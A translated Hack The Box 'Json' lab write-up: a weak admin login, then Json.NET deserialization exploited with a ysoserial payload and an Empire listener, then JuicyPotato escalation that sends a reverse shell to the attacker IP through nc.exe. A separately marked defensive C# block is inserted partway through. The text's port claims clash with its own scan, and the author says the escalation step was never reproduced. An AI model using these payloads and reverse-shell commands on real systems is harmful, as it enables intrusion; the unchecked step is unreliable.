Hi everyone. Today's CTF challenge box is "Json" from Hack The Box. Hack The Box is an excellent online lab platform for sharpening your penetration-testing and black-box testing skills; it hosts a large number of boxes at every difficulty level, from easy to hard. This box is rated medium, and the task is to find user.txt and root.txt on the target.

Summary

- Json.NET deserialization to get a shell
- JuicyPotato privilege escalation

Information gathering

nmap found ports 22 and 80 open
```text
nmap -sC -sV -p- -T4 10.10.10.158

Host is up (0.052s latency).
Not shown: 65521 closed ports
PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          FileZilla ftpd
| ftp-syst:
|_  SYST: UNIX emulated by FileZilla
80/tcp    open  http         Microsoft IIS httpd 8.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Json HTB
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49154/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
```
The login page on the homepage gives in to a blind guess at a weak password:

admin:admin

Once inside, the admin panel offers no real functionality.

Capturing the login request reveals something odd: after changing the request to GET, a bearer parameter appears.

The bearer parameter is JSON. Mangling that JSON parameter:
{"Id":1,"UserName":"admin","Password":"21232f297a57a5a743894a0e4a801fc3",hello world}
Json.NET deserialization getshell

The resulting error shows that the parameter is deserialized with Json.NET.

Use ysoserial.exe to inject a payload into the parameter and get a shell: ysoserial.exe combined with an Empire PowerShell payload.
On the Empire side:

```text
./empire
uselistener http
set Host http://10.10.xx.xx:4444
set Port 4444
execute
back
launcher powershell
>> this yields the $$Empire payload$$
```

On the Windows side:

```text
ysoserial.exe -g ObjectDataProvider -f json.net -c "$$Empire Payload$$" -o base64
```
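As an added defensive illustration (not code from the writeup or from the box), this is how the bearer parameter could be parsed so that a `$type`-carrying gadget chain like the ObjectDataProvider one above is rejected instead of instantiated. It uses Newtonsoft.Json; the `Account` class and `BearerTokenParser` names are hypothetical, and the token is assumed to be base64 of the JSON object shown earlier.

```csharp
using System;
using System.Linq;
using System.Text;
using Newtonsoft.Json;
using Newtonsoft.Json.Linq;

// Constructed DTO mirroring the fields seen in the captured token (hypothetical name).
public sealed class Account
{
    public int Id { get; set; }
    public string UserName { get; set; }
    public string Password { get; set; }   // MD5 hex digest in the captured token
}

public static class BearerTokenParser
{
    // Vulnerable pattern: TypeNameHandling.All lets the token pick the CLR type to
    // instantiate, which is exactly what the ObjectDataProvider gadget relies on.
    public static Account ParseUnsafe(string base64Token)
    {
        string json = Encoding.UTF8.GetString(Convert.FromBase64String(base64Token));
        return JsonConvert.DeserializeObject<Account>(json,
            new JsonSerializerSettings { TypeNameHandling = TypeNameHandling.All });
    }

    // Hardened pattern: never honour "$type", reject any token that carries it,
    // and bind only the expected members of a plain DTO.
    public static Account ParseSafe(string base64Token)
    {
        byte[] raw;
        try { raw = Convert.FromBase64String(base64Token); }
        catch (FormatException) { throw new ArgumentException("bearer is not valid base64"); }

        // JToken.Parse throws on malformed input such as the "hello world" injected above,
        // so the caller can return a generic 400 instead of leaking a Json.NET stack trace.
        JToken token = JToken.Parse(Encoding.UTF8.GetString(raw));
        if (token.Type != JTokenType.Object)
            throw new ArgumentException("bearer must be a JSON object");
        if (((JObject)token).Descendants().OfType<JProperty>().Any(p => p.Name == "$type"))
            throw new ArgumentException("type metadata in bearer rejected");

        var settings = new JsonSerializerSettings
        {
            TypeNameHandling = TypeNameHandling.None,          // the default, stated explicitly
            MissingMemberHandling = MissingMemberHandling.Error // unknown members are an error
        };
        return token.ToObject<Account>(JsonSerializer.Create(settings));
    }
}
```

Even with safe deserialization, a client-supplied token that carries the user id and password hash in the clear is not an authentication token; it needs a server-side signature or an opaque session id so it cannot be forged.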
Get user.txt.

JuicyPotato privilege escalation

Check the Windows version:
```text
(empire:XXXXXXX) shell systeminfo | findstr Windows
OS Name:                   Microsoft Windows Server 2012 R2 Datacenter
```
The user holds SeImpersonatePrivilege:
```text
(empire:XXXXXXX) shell whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
```
On Windows Server versions before 2019 the JuicyPotato privilege-escalation tool can be used. Relying on SeImpersonatePrivilege, we should be able to escalate to SYSTEM.
```text
nc -lvp 4444

(empire:XXXXXXX) cd \windows\temp
(empire:XXXXXXX) shell copy \\10.10.xx.xx\n00B\JuicyPotato.exe .
(empire:XXXXXXX) shell copy \\10.10.xx.xx\n00B\nc.exe .
(empire:XXXXXXX) shell echo c:\windows\temp\nc.exe 10.10.xx.xx 4444 -e cmd.exe > start.bat
(empire:XXXXXXX) shell JuicyPotato.exe -l 1337 -p C:\\windows\temp\start.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
```
Get root.txt. I didn't have time to reproduce the privilege-escalation step, but the approach is right.